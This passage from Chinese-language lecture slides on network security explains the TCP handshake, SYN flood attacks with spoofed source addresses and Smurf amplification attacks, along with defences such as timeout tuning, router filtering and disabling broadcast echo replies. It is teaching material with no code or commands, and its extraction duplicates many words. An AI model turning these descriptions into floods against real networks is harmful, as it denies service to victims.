50、YN = 1, seq = xACK = 1, seq = x + 1, ack = y 1CLOSEDCLOSED數據傳送主動打開被動打開AB客戶服務器SYN = 1, ACK = 1, seq = y, ack= x 1 在B返回一個確認的SYN-ACK包的時候有個潛在的弊端，他可能不會接到A回應的ACK包。這個也就是所謂的半開放連接半開放連接，B需要 耗費一定的數量的系統內存耗費一定的數量的系統內存來等待這個未決的連接來等待這個未決的連接，雖然這個數量是受限的，但是惡意者可以通過創建很多的半開放式連接來發動SYN洪水攻擊 。SYN風暴攻擊手段風暴攻擊手段 通過ip欺騙可以很容易的實現半開

51、放連接。攻擊者發送SYN包給受害者系統，這個看起來是合法的，但事實上所謂的C根本不會回應這個 。SYN-ACK報文，這意味著受害者將永遠不會接到ACK報文。而此時，半開放連接將最終耗用受害者所有的系統資源，受害者將不能再接收任何其他的請求。SYN風暴攻擊手段風暴攻擊手段 通常等待ACK返回包有超時限制，所以半開放，連接將最終超時，而受害者系統也會自動修復。雖然這樣，但是在受害者系統修復之前，攻擊者可以很容易的一直發送虛假的虛假的SYN請求包請求包來持續攻擊。SYN風暴攻擊手段風暴攻擊手段 在大多數情況下，受害者幾乎不能接受任何其他的請求，但是這種攻擊不會影響到已經存在的進站或者是出站連接。雖然

52、這樣，受害者系統 還是可能耗盡系統資源，以導致其他種種問題。 攻擊系統的位置幾乎是不可確認的，因為SYN包中的源地址多數都是虛假的。當SYN包到達受害者系統的時候，沒有辦法找到他的真實地址 。SYN風暴攻擊手段風暴攻擊手段SYN風暴攻擊過程風暴攻擊過程 SYN-RCVDLISTEN偽造源地址的偽造源地址的SYN包包Port flooding occursCLOSEDCLOSED被動打開被動打開AB攻擊者攻擊者A目標主機目標主機BSYN + ACK 常用的防范方法包括5個方面： 1、優化系統配置： 縮短超時時間； 增加半連接隊列的長度 關閉不重要的服務 2、優化路由器配置： 配置路由器的外網卡

53、配置路由器的內網卡分析與對抗分析與對抗 3、完善基礎設施 4、使用防火墻： 5、主動監視分析與對抗分析與對抗 Smurf攻擊是以最初發動這種攻擊的程序名Smurf來命名的。這種攻擊方法結合使用了IP欺騙和帶有廣播地址的ICMP請求-響應方法使大量網絡傳輸充斥目標系統，引起目標系統拒絕為正常系統進行服務，屬于間接、借力攻擊方式。 任何連接到互聯網上的主機或其他支持ICMP請求-響應的網絡設備都可能成為這種攻擊的目標。Smurf攻擊攻擊2 原理：攻擊者偽造一個ICMP echo請求包，其源地址為目標受害者地址，目的地址為中間脆弱網絡的廣播地址，并將該echo請求包發送到中間脆弱網絡。中間脆弱網絡中

54、的主機收到該echo請求包時，會以echo響應包作為回答，而這些包最終被發送到目標受害者。這樣大量同時返回的echo響應數據包造成目標網絡嚴重擁塞、丟包，甚至完全不可用等現象。Smurf攻擊手段攻擊手段Smurf攻擊手段攻擊手段 攻擊特征 涉及到三方：攻擊者，中間目標網絡，受害者 以較小的網絡帶寬資源，通過放大作用，吃掉較大帶寬的受害者系統 Smurf放大器 Smurf放大器網絡：不僅允許ICMP Echo請求發給網絡的廣播地址，并且允許ICMP Echo-Reply發送回去 這樣的公司越多，對Internet的危害就越大Smurf攻擊手段攻擊手段 實施Smurf攻擊 需要長期的準備，首先找到

55、足夠多的中間網絡 集中向這些中間網絡發出ICMP Echo包Smurf攻擊手段攻擊手段 針對最終受害者 沒有直接的方法可以阻止自己接收沒有直接的方法可以阻止自己接收ICMP Echo Reply消息消息 在在路由器路由器上阻止這樣的應答消息，但是，結果是，路由器本身遭受上阻止這樣的應答消息，但是，結果是，路由器本身遭受了了DoS攻擊攻擊 與中間目標網絡聯系與中間目標網絡聯系 針對中間網絡 關閉外來的關閉外來的IP廣播消息，但是，如果攻擊者從內部機器發起攻擊，廣播消息，但是，如果攻擊者從內部機器發起攻擊，仍然不能阻止仍然不能阻止smurf攻擊攻擊 配置操作系統，對于廣播地址的配置操作系統，對于廣播地址的ICMP包不響應包不響應Smurf攻擊的防止措施攻擊的防止措施 針對發起攻擊的主機及其網絡： 在路由器上配置其過濾規則，丟棄那些即將發到外部網而源在路由器上配置其過濾規則，丟棄那些即將發到外部網而源IP地址地址不具有內部網絡地址的包。不具有內部網絡地址的包。Smurf攻擊的防止措施攻擊的防止措施 SYN flooding和Smurf攻擊利用TCP/IP協議中的設計弱點，通過強行引入大量的網絡包來占用帶寬。迫使彌補受害主機拒絕對正常的服務請求進行響應。利用處理程序錯誤進行攻擊利用處理程序錯誤進行攻擊3 原理：利用TCP/IP協議實現中的處理程序錯誤進行攻擊，即故意錯